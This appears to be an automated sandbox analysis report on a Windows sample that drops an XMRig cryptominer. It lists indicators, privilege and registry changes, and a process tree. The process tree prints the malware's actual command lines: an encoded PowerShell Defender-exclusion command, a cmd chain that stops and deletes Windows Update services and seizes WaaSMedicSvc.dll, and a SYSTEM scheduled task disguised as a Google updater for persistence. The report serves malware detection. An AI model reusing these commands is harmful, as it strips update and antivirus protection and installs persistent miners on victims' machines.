Analysis
- max time kernel: 299s
- max time network: 274s
- platform: windows10_x64
- resource: win10-20220414-en
- submitted: 15-05-2022 10:15
Static task: static1
Behavioral task: behavioral1
Sample: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
Resource: win7-20220414-en
General
- Target: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
- Size: 7.6MB
- MD5: 95104aa61ed30687c13e5c644d5722f3
- SHA1: f9788f808044d448f73203d93da0021cefb781ff
- SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
- SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
| description | ioc | process |
|---|---|---|
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe |
-
XMRig Miner Payload 5 IoCs
Processes:
| resource | yara_rule |
|---|---|
| behavioral2/memory/1376-396-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig |
| behavioral2/memory/1376-397-0x000000014036DB84-mapping.dmp | xmrig |
| behavioral2/memory/1376-398-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig |
| behavioral2/memory/1376-400-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig |
| behavioral2/memory/1376-403-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig |
-
Executes dropped EXE 1 IoCs
Processes:
| pid | process |
|---|---|
| 2188 | services.exe |
-
Possible privilege escalation attempt 4 IoCs
Processes:
| pid | process |
|---|---|
| 3132 | icacls.exe |
| 3756 | takeown.exe |
| 872 | icacls.exe |
| 68 | takeown.exe |
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
| pid | process |
|---|---|
| 68 | takeown.exe |
| 3132 | icacls.exe |
| 3756 | takeown.exe |
| 872 | icacls.exe |
-
Drops file in System32 directory 3 IoCs
Processes:
| description | ioc | process |
|---|---|---|
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe |
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
| description | pid | process | target process |
|---|---|---|---|
| PID 1876 set thread context of 3544 | 1876 | conhost.exe | conhost.exe |
| PID 1876 set thread context of 1376 | 1876 | conhost.exe | svchost.exe |
-
Drops file in Program Files directory 3 IoCs
Processes:
| description | ioc | process |
|---|---|---|
| File created | C:\Program Files\Windows\services.exe | conhost.exe |
| File opened for modification | C:\Program Files\Windows\services.exe | conhost.exe |
| File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe |
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
| description | ioc | process |
|---|---|---|
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | conhost.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | conhost.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | conhost.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | conhost.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe |
-
Modifies registry key 1 TTPs 18 IoCs
Processes:
| pid | process |
|---|---|
| 2252 | reg.exe |
| 428 | reg.exe |
| 524 | reg.exe |
| 3876 | reg.exe |
| 2100 | reg.exe |
| 2828 | reg.exe |
| 2200 | reg.exe |
| 836 | reg.exe |
| 3324 | reg.exe |
| 3320 | reg.exe |
| 3168 | reg.exe |
| 412 | reg.exe |
| 796 | reg.exe |
| 3336 | reg.exe |
| 1988 | reg.exe |
| 412 | reg.exe |
| 2772 | reg.exe |
| 3900 | reg.exe |
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
| pid | process | occurrences |
|---|---|---|
| 3780 | powershell.exe | 3 |
| 3924 | conhost.exe | 1 |
| 200 | powershell.exe | 3 |
| 1876 | conhost.exe | 1 |
| 1376 | svchost.exe | remaining entries (64 IoCs in total) |
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
| pid | process |
|---|---|
| 640 | |
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
- 3780 powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- 3924 conhost.exe: Token: SeDebugPrivilege
- 3756 takeown.exe: Token: SeTakeOwnershipPrivilege
- 200 powershell.exe: Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
- 1876 conhost.exe: Token: SeDebugPrivilege
- 68 takeown.exe: Token: SeTakeOwnershipPrivilege
- 1376 svchost.exe: Token: SeLockMemoryPrivilege, SeLockMemoryPrivilege
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
| description | pid | process | target process | occurrences |
|---|---|---|---|---|
| PID 3904 wrote to memory of 3924 | 3904 | a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe | conhost.exe | 3 |
| PID 3924 wrote to memory of 1812 | 3924 | conhost.exe | cmd.exe | 2 |
| PID 1812 wrote to memory of 3780 | 1812 | cmd.exe | powershell.exe | 2 |
| PID 3924 wrote to memory of 2708 | 3924 | conhost.exe | cmd.exe | 2 |
| PID 2708 wrote to memory of 2088 | 2708 | cmd.exe | sc.exe | 2 |
| PID 2708 wrote to memory of 304 | 2708 | cmd.exe | sc.exe | 2 |
| PID 2708 wrote to memory of 316 | 2708 | cmd.exe | sc.exe | 2 |
| PID 2708 wrote to memory of 2308 | 2708 | cmd.exe | sc.exe | 2 |
| PID 2708 wrote to memory of 1716 | 2708 | cmd.exe | sc.exe | 2 |
| PID 2708 wrote to memory of 2828 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 428 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 2772 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 2200 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 3900 | 2708 | cmd.exe | reg.exe | 2 |
| PID 3924 wrote to memory of 1632 | 3924 | conhost.exe | cmd.exe | 2 |
| PID 2708 wrote to memory of 3756 | 2708 | cmd.exe | takeown.exe | 2 |
| PID 1632 wrote to memory of 3908 | 1632 | cmd.exe | schtasks.exe | 2 |
| PID 2708 wrote to memory of 3132 | 2708 | cmd.exe | icacls.exe | 2 |
| PID 2708 wrote to memory of 2252 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 524 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 412 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 3168 | 2708 | cmd.exe | reg.exe | 2 |
| PID 2708 wrote to memory of 3732 | 2708 | cmd.exe | schtasks.exe | 2 |
| PID 2708 wrote to memory of 3768 | 2708 | cmd.exe | schtasks.exe | 2 |
| PID 2708 wrote to memory of 1412 | 2708 | cmd.exe | schtasks.exe | 2 |
| PID 2708 wrote to memory of 2512 | 2708 | cmd.exe | schtasks.exe | 2 |
| PID 2708 wrote to memory of 2076 | 2708 | cmd.exe | schtasks.exe | 2 |
| PID 2708 wrote to memory of 2072 | 2708 | cmd.exe | schtasks.exe | 2 |
| PID 2708 wrote to memory of 2568 | 2708 | cmd.exe | schtasks.exe | 2 |
| PID 3924 wrote to memory of 2524 | 3924 | conhost.exe | cmd.exe | 2 |
| PID 2524 wrote to memory of 2492 | 2524 | cmd.exe | schtasks.exe | 2 |
| PID 2188 wrote to memory of 1876 | 2188 | services.exe | conhost.exe | 1 |
Processes
[depth 1] C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
  - Suspicious use of WriteProcessMemory
[depth 2] C:\Windows\System32\conhost.exe
  command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
[depth 3] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
  - Suspicious use of WriteProcessMemory
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
[depth 3] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  - Suspicious use of WriteProcessMemory
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop WaaSMedicSvc
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop bits
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop dosvc
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies security service
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
[depth 4] C:\Windows\system32\icacls.exe
  command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
[depth 4] C:\Windows\system32\takeown.exe
  command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop wuauserv
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop UsoSvc
[depth 4] C:\Windows\system32\reg.exe
  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
[depth 4] C:\Windows\system32\schtasks.exe
  command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
[depth 3] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
  - Suspicious use of WriteProcessMemory
[depth 4] C:\Windows\system32\schtasks.exe
  command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
  - Creates scheduled task(s)
[depth 3] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
  - Suspicious use of WriteProcessMemory
[depth 4] C:\Windows\system32\schtasks.exe
  command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"
[depth 1] C:\Program Files\Windows\services.exe
  command line: "C:\Program Files\Windows\services.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
[depth 2] C:\Windows\System32\conhost.exe
  command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
[depth 3] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
[depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
[depth 3] C:\Windows\System32\cmd.exe
  command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop UsoSvc
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop bits
[depth 4] C:\Windows\system32\icacls.exe
  command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
[depth 4] C:\Windows\system32\takeown.exe
  command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
[depth 4] C:\Windows\system32\reg.exe
  command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop dosvc
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop wuauserv
[depth 4] C:\Windows\system32\sc.exe
  command line: sc stop WaaSMedicSvc
[depth 4] C:\Windows\system32\reg.exe
